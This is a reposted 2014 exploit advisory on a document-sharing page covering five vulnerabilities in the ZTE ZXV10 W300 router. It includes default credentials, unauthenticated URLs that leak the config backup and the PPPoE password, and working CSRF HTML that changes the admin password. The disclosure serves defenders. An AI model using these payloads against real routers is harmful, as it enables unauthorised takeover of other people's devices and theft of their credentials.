ZTE W300 Router Multiple Vulnerabilities

Hochgeladen von

Alejandro Acuña

0% fanden dieses Dokument nützlich (0 Abstimmungen)

132 Ansichten2 Seiten

Vulnerabilidades ZTE

Originaltitel

Vulnerability ZTE ZXV W300 Colombia

Copyright

Verfügbare Formate

TXT, PDF, TXT oder online auf Scribd lesen

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Dieses Dokument melden

Vulnerabilidades ZTE

Copyright:

Verfügbare Formate

Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen

Markieren Sie unangemessene Inhalte

0% fanden dieses Dokument nützlich (0 Abstimmungen)

132 Ansichten2 Seiten

ZTE W300 Router Multiple Vulnerabilities

Hochgeladen von

Alejandro Acuña

Vulnerabilidades ZTE

Copyright:

Verfügbare Formate

Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen

Markieren Sie unangemessene Inhalte

Zu Seite

Sie sind auf Seite 1von 2

Im Dokument suchen

# Exploit Title:

ZTE WXV10 W300 Multiple Vulnerabilities

# Date:
17-05-2014
# Server Version:
RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# Firmware:
W300V1.0.0a_ZRD_LK
# ADSL Firmware:
FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on:
Kali Linux x86_64
# Exploit Author:
Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-lin
k-rompager-dos/
#1| Default Password Being Used (CVE-2014-4018)
-----------------------------------------------In ZTE routers the username is a constant which is "admin" and the password by d
efault is "admin"
#2| ROM-0 Backup File Disclosure (CVE-2014-4019)
------------------------------------------------The rom-0 backup file contains sensitive information such as the router password
.
There is a disclosure in which anyone can download that file without any authent
ication by a simple GET request.
POC:
http://192.168.1.1/rom-0
You can find the router password using my rom-0 configuration decompressor.
http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Confi
guration-Decompressor.html
#3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)
--------------------------------------------------------------------If you look at the frame source in the "Internet" tab under the "Interface Setup
" you can see this doLoad function in line 542 which fetches the password and di
splays it there. The frame URI is /basic/home_wan.htm.
function doLoad() {
var value = document.forms[0].wanTypeRadio[2].checked;
doEnable();
QosCheck();
WANChkIdleTimeT();
if (value)
pppStaticCheck();
LockWhenPVC0();
LockPVC();
if(document.forms[0].wan_PPPPassword != null)
{
document.forms[0].wan_PPPPassword.value = pwdppp;
}
}
The "pwdpp" is loaded from an external file which you can see at the bottom of t
he page.
<script language="javascript" src="/basic/tc2wanfun.js"></script>
Once the user authenticates the router till another successful restart the passw
ord is written in that external JS file.
POC:
http://192.168.1.1/basic/tc2wanfun.js

#4| Admin Password Manipulation CSRF (CVE-2014-4155)

----------------------------------------------------You can change the password to blank by requesting /Forms/tools_admin_1 with a G
ET requesting containing HTTP basic authentication.
POC:
<iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></ifra
me>
If you send something like above to the victim, he will be prompted for the logi
n and once he enter his credentials, his password will be immediately changed to
a blank password.
Ofcourse since there is no XSRF token in the request you change the password as
you wish.
POC:
<html>
<body>
<form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method=
"POST">
<input type="hidden" name="uiViewTools_Password" value="your_passwd" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd
" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
#5| Denial of Service
----------------------You can see my previous post about this vulnerability and the exploit.
https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Servi
ce.html
http://www.exploit-db.com/exploits/33737

Das könnte Ihnen auch gefallen

CORE Hikvision Framework
Dokument6 Seiten
CORE Hikvision Framework
john
Noch keine Bewertungen
OpenStack Pike Volet 3
Dokument12 Seiten
OpenStack Pike Volet 3
IRIE
Noch keine Bewertungen
Configuration
Dokument7 Seiten
Configuration
Pratik Sanas
Noch keine Bewertungen
Pandora Agent - Conf
Dokument12 Seiten
Pandora Agent - Conf
moises tovar
Noch keine Bewertungen
Aix Various Notes
Dokument18 Seiten
Aix Various Notes
azkarashare
Noch keine Bewertungen
Fortigate Troubleshooting Tips: Windows Ad Sso
Dokument8 Seiten
Fortigate Troubleshooting Tips: Windows Ad Sso
m0nsys
Noch keine Bewertungen
Facultatea de Inginerie Electrica - CIEAC-LMN Marie Curie Doctoral School in EE and CS
Dokument14 Seiten
Facultatea de Inginerie Electrica - CIEAC-LMN Marie Curie Doctoral School in EE and CS
jamalsweden
Noch keine Bewertungen
Security Hardening Checklist Guide For Cisco Routers
Dokument7 Seiten
Security Hardening Checklist Guide For Cisco Routers
Faouzi Maddouri
Noch keine Bewertungen
Attackive Directory
Dokument6 Seiten
Attackive Directory
pikafou34
Noch keine Bewertungen
CP R80.30 LoggingAndMonitoring AdminGuide
Dokument159 Seiten
CP R80.30 LoggingAndMonitoring AdminGuide
Rodolfo Aviles
Noch keine Bewertungen
Active Directory
Dokument10 Seiten
Active Directory
Kindra
Noch keine Bewertungen
Ethical Hacking
Dokument5 Seiten
Ethical Hacking
ethicalishu
Noch keine Bewertungen
Create PDF in Your Applications With The Pdfcrowd: HTML To PDF Api
Dokument6 Seiten
Create PDF in Your Applications With The Pdfcrowd: HTML To PDF Api
Jean Pierre
100% (1)
Combo Fix
Dokument5 Seiten
Combo Fix
《MATHEUS》 EDUARDO
Noch keine Bewertungen
Dropbox
Dokument59 Seiten
Dropbox
Rulver Quiroz Cabanillas
Noch keine Bewertungen
Lfi To Rce
Dokument21 Seiten
Lfi To Rce
kratos897
Noch keine Bewertungen
Cybersecurity notes
Dokument10 Seiten
Cybersecurity notes
nikhil kannale
Noch keine Bewertungen
26.1.7 Lab - Snort and Firewall Rules
Dokument8 Seiten
26.1.7 Lab - Snort and Firewall Rules
Fata Hasan
Noch keine Bewertungen
Accel PPP
Dokument46 Seiten
Accel PPP
raphaelrrl
Noch keine Bewertungen
Práctica de Laboratorio 26.1.7
Dokument10 Seiten
Práctica de Laboratorio 26.1.7
rojas.saldana.armando.sptm
Noch keine Bewertungen
Configure DNS and DHCP with Dnsmasq
Dokument32 Seiten
Configure DNS and DHCP with Dnsmasq
ntuta
Noch keine Bewertungen
26.1.7 Lab - Snort and Firewall Rules
Dokument17 Seiten
26.1.7 Lab - Snort and Firewall Rules
LISS MADELEN TRAVEZ ANGUETA
Noch keine Bewertungen
12.1.1.7 Lab - Snort and Firewall Rules
Dokument9 Seiten
12.1.1.7 Lab - Snort and Firewall Rules
Muhammad Taufiq
Noch keine Bewertungen
Snort and Firewall Rules-1
Dokument9 Seiten
Snort and Firewall Rules-1
Ruel Alejandro
Noch keine Bewertungen
Windows Red Team Cheat Sheat
Dokument13 Seiten
Windows Red Team Cheat Sheat
Reniere Santos
Noch keine Bewertungen
Install and Configure Essential Services on CentOS 7 Server
Dokument48 Seiten
Install and Configure Essential Services on CentOS 7 Server
Marina Molina Moreno
Noch keine Bewertungen
DoLAB - Ice TryHackMe Walkthrough
Dokument7 Seiten
DoLAB - Ice TryHackMe Walkthrough
SECURITY 365
Noch keine Bewertungen
6700 545136
Dokument2 Seiten
6700 545136
Juan Francisco Salomón Rodríguez
Noch keine Bewertungen
zCEE Customization Security and DB2 PDF
Dokument47 Seiten
zCEE Customization Security and DB2 PDF
apmount
Noch keine Bewertungen
VPNC
Dokument22 Seiten
VPNC
tesjalapa 23
Noch keine Bewertungen
Lab - Snort and Firewall Rules: Topology
Dokument9 Seiten
Lab - Snort and Firewall Rules: Topology
Ярослав Костенко
Noch keine Bewertungen
Linux SAN Related Commands
Dokument7 Seiten
Linux SAN Related Commands
Shashi Kanth
Noch keine Bewertungen
26.1.7 Lab - Snort and Firewall Rules
Dokument8 Seiten
26.1.7 Lab - Snort and Firewall Rules
Rana Elwan
100% (1)
Kamailio for Building an IMS Core for VoLTE
Dokument18 Seiten
Kamailio for Building an IMS Core for VoLTE
Dxscrib
Noch keine Bewertungen
CLI commands for troubleshooting Juniper ScreenOS firewalls
Dokument5 Seiten
CLI commands for troubleshooting Juniper ScreenOS firewalls
zian
Noch keine Bewertungen
Hackthebox Backdoor: Prepared by Imamrahman15
Dokument17 Seiten
Hackthebox Backdoor: Prepared by Imamrahman15
Mochamad Fariz
Noch keine Bewertungen
Kaspersky Internet Security Error
Dokument2 Seiten
Kaspersky Internet Security Error
Murali Karthick R
Noch keine Bewertungen
12.1.1.7 Lab - Snort and Firewall Rules PDF
Dokument9 Seiten
12.1.1.7 Lab - Snort and Firewall Rules PDF
Interesting facts Channel
Noch keine Bewertungen
Site To Site VPN With Internet Access (Hairpinning) - XeruNetworks
Dokument13 Seiten
Site To Site VPN With Internet Access (Hairpinning) - XeruNetworks
Aung Kyaw Thu
Noch keine Bewertungen
Cisco Router Switch Security Hardening
Dokument9 Seiten
Cisco Router Switch Security Hardening
Euribiades Jose Gomez
Noch keine Bewertungen
Код
Dokument109 Seiten
Код
cepik
Noch keine Bewertungen
CCNA SEC Notes
Dokument41 Seiten
CCNA SEC Notes
Suman Kumar
Noch keine Bewertungen
Comandi
Dokument5 Seiten
Comandi
Miamin Rizzo
Noch keine Bewertungen
Server Setup
Dokument6 Seiten
Server Setup
Sahil Thakur
Noch keine Bewertungen
Snort IDS Logs and Firewall Rules
Dokument9 Seiten
Snort IDS Logs and Firewall Rules
Mariah De asis
Noch keine Bewertungen
Synacktiv-Danfoss-Storeview-Multiple-Vulnerabilities
Dokument6 Seiten
Synacktiv-Danfoss-Storeview-Multiple-Vulnerabilities
kepakko
Noch keine Bewertungen
Monitor Mode On Gaia OS and SecurePlataform OS
Dokument4 Seiten
Monitor Mode On Gaia OS and SecurePlataform OS
CLVF030191
Noch keine Bewertungen
Snort and Firewall Lab - Logs and Rules
Dokument7 Seiten
Snort and Firewall Lab - Logs and Rules
Thái Nguyễn
Noch keine Bewertungen
Ldom Oracle VM For Sparc
Dokument89 Seiten
Ldom Oracle VM For Sparc
rajlvu
100% (1)
2301-2303 Log Book
Dokument17 Seiten
2301-2303 Log Book
CatherineOng
Noch keine Bewertungen
Ruby Metasploit Content
Dokument7 Seiten
Ruby Metasploit Content
febit57677
Noch keine Bewertungen
732 Upgrade Downgrade Doc ncs5500
Dokument23 Seiten
732 Upgrade Downgrade Doc ncs5500
Gautier Marsot
Noch keine Bewertungen
Standard Serial Driver Description: Linux 2.6 Kernel
Dokument14 Seiten
Standard Serial Driver Description: Linux 2.6 Kernel
Henk Boshoff
Noch keine Bewertungen
Troubleshooting A Netscreen Site 2 Site VPN - Netscreen
Dokument3 Seiten
Troubleshooting A Netscreen Site 2 Site VPN - Netscreen
Luis Rodriguez
Noch keine Bewertungen
NCC Output 2023 06 06 1686049369
Dokument13 Seiten
NCC Output 2023 06 06 1686049369
uglyface007
Noch keine Bewertungen
Cisco Firepower 1120 ASA Image and FXOS
Dokument4 Seiten
Cisco Firepower 1120 ASA Image and FXOS
vetinh0607
Noch keine Bewertungen
Aporte InformacionTecnicaPC Juan Correa
Dokument28 Seiten
Aporte InformacionTecnicaPC Juan Correa
camilo
Noch keine Bewertungen
Cisco Viptela SDWAN: OSPF and BGP (Part 2) : Document Information: Lab Objective
Dokument21 Seiten
Cisco Viptela SDWAN: OSPF and BGP (Part 2) : Document Information: Lab Objective
Cuong Ha
Noch keine Bewertungen
Network Security All-in-one: ASA Firepower WSA Umbrella VPN ISE Layer 2 Security
Von Everand
Network Security All-in-one: ASA Firepower WSA Umbrella VPN ISE Layer 2 Security
Redouane MEDDANE
Noch keine Bewertungen
CISCO PACKET TRACER LABS: Best practice of configuring or troubleshooting Network
Von Everand
CISCO PACKET TRACER LABS: Best practice of configuring or troubleshooting Network
Mulayam Singh
Noch keine Bewertungen
AOS 8.4.10 ReleaseNotesRevA
Dokument5 Seiten
AOS 8.4.10 ReleaseNotesRevA
Alejandro Acuña
Noch keine Bewertungen
AOS 8.7.0 ReleaseNotes-RevA
Dokument12 Seiten
AOS 8.7.0 ReleaseNotes-RevA
Alejandro Acuña
Noch keine Bewertungen
AOS 8.5.10 ReleaseNotes-RevA
Dokument7 Seiten
AOS 8.5.10 ReleaseNotes-RevA
Alejandro Acuña
Noch keine Bewertungen
Snippet
Dokument2 Seiten
Snippet
Alejandro Acuña
Noch keine Bewertungen
EtherHaul 1200 & 1200L.v2 SW Upgrade Procedure (Mar 2012)
Dokument10 Seiten
EtherHaul 1200 & 1200L.v2 SW Upgrade Procedure (Mar 2012)
Alejandro Acuña
Noch keine Bewertungen
AOS 8.7.0 ReleaseNotes-RevD
Dokument12 Seiten
AOS 8.7.0 ReleaseNotes-RevD
Alejandro Acuña
Noch keine Bewertungen
AOS 8.5.8 ReleaseNotes
Dokument6 Seiten
AOS 8.5.8 ReleaseNotes
Alejandro Acuña
Noch keine Bewertungen
AOS 8.5.6 ReleaseNotes-RevB
Dokument6 Seiten
AOS 8.5.6 ReleaseNotes-RevB
Alejandro Acuña
Noch keine Bewertungen
Xirrus CLI AOS
Dokument624 Seiten
Xirrus CLI AOS
Alejandro Acuña
Noch keine Bewertungen
T Rec G.992.5 200501 S!!PDF e
Dokument110 Seiten
T Rec G.992.5 200501 S!!PDF e
Alejandro Acuña
Noch keine Bewertungen
AOS 8.4.9 ReleaseNotesRevA
Dokument5 Seiten
AOS 8.4.9 ReleaseNotesRevA
Alejandro Acuña
Noch keine Bewertungen
Configure and Manage an ePMP Device
Dokument24 Seiten
Configure and Manage an ePMP Device
Martin Aguilera
Noch keine Bewertungen
Configure and Manage an ePMP Device
Dokument24 Seiten
Configure and Manage an ePMP Device
Martin Aguilera
Noch keine Bewertungen
AOSLite 8.4.2-205 ReleaseNotes RevA
Dokument3 Seiten
AOSLite 8.4.2-205 ReleaseNotes RevA
Alejandro Acuña
Noch keine Bewertungen
AOS 8.5.5 ReleaseNotes-RevA
Dokument6 Seiten
AOS 8.5.5 ReleaseNotes-RevA
Alejandro Acuña
Noch keine Bewertungen
XMS ReleaseNotes 8.2.7 8408 RevA v1
Dokument4 Seiten
XMS ReleaseNotes 8.2.7 8408 RevA v1
Alejandro Acuña
Noch keine Bewertungen
AOSLite 8.4.4-216 ReleaseNotes RevA
Dokument3 Seiten
AOSLite 8.4.4-216 ReleaseNotes RevA
Alejandro Acuña
Noch keine Bewertungen
Run As Addmin
Dokument1 Seite
Run As Addmin
Alejandro Acuña
Noch keine Bewertungen
IT Essentials v5 Chapter 1 Exam Answers
Dokument7 Seiten
IT Essentials v5 Chapter 1 Exam Answers
Jean Franco Ceron Huerta
Noch keine Bewertungen
Xirrus Userguide Xircon For Xirrus RevE
Dokument24 Seiten
Xirrus Userguide Xircon For Xirrus RevE
Alejandro Acuña
Noch keine Bewertungen
AOS 8.5.1 ReleaseNotes-v7RevB
Dokument5 Seiten
AOS 8.5.1 ReleaseNotes-v7RevB
Alejandro Acuña
Noch keine Bewertungen
About Bonjour
Dokument2 Seiten
About Bonjour
Telle Ang
Noch keine Bewertungen
Aug 2011 CSC R3-2 Datasheet
Dokument2 Seiten
Aug 2011 CSC R3-2 Datasheet
Alejandro Acuña
Noch keine Bewertungen
Movil Net
Dokument3 Seiten
Movil Net
Alejandro Acuña
Noch keine Bewertungen
HDM
Dokument119 Seiten
HDM
0260480981
Noch keine Bewertungen
SRX1500 Juniper Datasheet
Dokument4 Seiten
SRX1500 Juniper Datasheet
kani garg
Noch keine Bewertungen
MCQ Cse
Dokument5 Seiten
MCQ Cse
Sonia Arora
Noch keine Bewertungen
Prisma Access Release Notes 4 0
Dokument32 Seiten
Prisma Access Release Notes 4 0
razzaque003
Noch keine Bewertungen
TCAP - Transaction Capabilities Application Part Is Used by
Dokument7 Seiten
TCAP - Transaction Capabilities Application Part Is Used by
ramarneh
Noch keine Bewertungen
Unit: Designing and Developing A Website Assignment Title: Rambling Autumn 2020
Dokument5 Seiten
Unit: Designing and Developing A Website Assignment Title: Rambling Autumn 2020
Fatsani
Noch keine Bewertungen
Oracle Conf SBC
Dokument1.088 Seiten
Oracle Conf SBC
Amina FE
Noch keine Bewertungen
Blocksi Parent Portal Instructions PDF
Dokument6 Seiten
Blocksi Parent Portal Instructions PDF
Amcl Love
Noch keine Bewertungen
Configure Remote Access For Siemens PLC Through Tia Portal
Dokument44 Seiten
Configure Remote Access For Siemens PLC Through Tia Portal
Nhạt's
Noch keine Bewertungen
TR02 Parancsok V1-1 9
Dokument8 Seiten
TR02 Parancsok V1-1 9
Gaurav
Noch keine Bewertungen
What Are The Advantages of Address Translation Techniques Included? (Multiple Choice)
Dokument46 Seiten
What Are The Advantages of Address Translation Techniques Included? (Multiple Choice)
Rachid Abdel
Noch keine Bewertungen
Global Internet Report 2014
Dokument146 Seiten
Global Internet Report 2014
InternetSociety
Noch keine Bewertungen
Contextual References Latihan
Dokument5 Seiten
Contextual References Latihan
yohana
Noch keine Bewertungen
Lab9 FTP Manual
Dokument6 Seiten
Lab9 FTP Manual
Alankrit Gupta
Noch keine Bewertungen
Doc-IT Features and Benefits
Dokument8 Seiten
Doc-IT Features and Benefits
Lauro Bath
Noch keine Bewertungen
Batangas City Revenue Code of 2009
Dokument168 Seiten
Batangas City Revenue Code of 2009
Jerome Estores
Noch keine Bewertungen
Internet Receipt
Dokument2 Seiten
Internet Receipt
brm1shubha
Noch keine Bewertungen
Cyberops Undip
Dokument5 Seiten
Cyberops Undip
Adi
Noch keine Bewertungen
Authentication Service Security
Dokument1 Seite
Authentication Service Security
Manas Pandey
Noch keine Bewertungen
Developing E-Business Systems and Architectures
Dokument147 Seiten
Developing E-Business Systems and Architectures
Nikola Lanjak
Noch keine Bewertungen
All ENCOR (350-401) Portable Resource
Dokument417 Seiten
All ENCOR (350-401) Portable Resource
Anna Sorokina
100% (2)
Market Plan On Vodafone vs. Pakistani Operators
Dokument47 Seiten
Market Plan On Vodafone vs. Pakistani Operators
webscanz
Noch keine Bewertungen
Solution: Wireshark Lab: DHCP
Dokument7 Seiten
Solution: Wireshark Lab: DHCP
bob
Noch keine Bewertungen
Anchal Thesis 2007
Dokument113 Seiten
Anchal Thesis 2007
Aman Verma
Noch keine Bewertungen
Device Server User Guide: Part Number 900-417 Revision G June 2015
Dokument87 Seiten
Device Server User Guide: Part Number 900-417 Revision G June 2015
HAROL ALEXIS VALENCIA OSPINA
Noch keine Bewertungen
DGS 1510 Series Datasheet en EU
Dokument7 Seiten
DGS 1510 Series Datasheet en EU
Hector Loaiza
Noch keine Bewertungen
MCPA
Dokument12 Seiten
MCPA
nitish
Noch keine Bewertungen
Account Registration
Dokument11 Seiten
Account Registration
Kenneth Lyle Mempin
Noch keine Bewertungen
Educ 103 Midterm Review
Dokument90 Seiten
Educ 103 Midterm Review
Alli
Noch keine Bewertungen
Book - Mental Health in The Digital Age-Palgrave Macmillan (2023)
Dokument215 Seiten
Book - Mental Health in The Digital Age-Palgrave Macmillan (2023)
All in One
Noch keine Bewertungen
Online Exam With Zoom Invigilation: Guide For MQ Students: Shorter Two Page Overview of This Document
Dokument19 Seiten
Online Exam With Zoom Invigilation: Guide For MQ Students: Shorter Two Page Overview of This Document
egem
Noch keine Bewertungen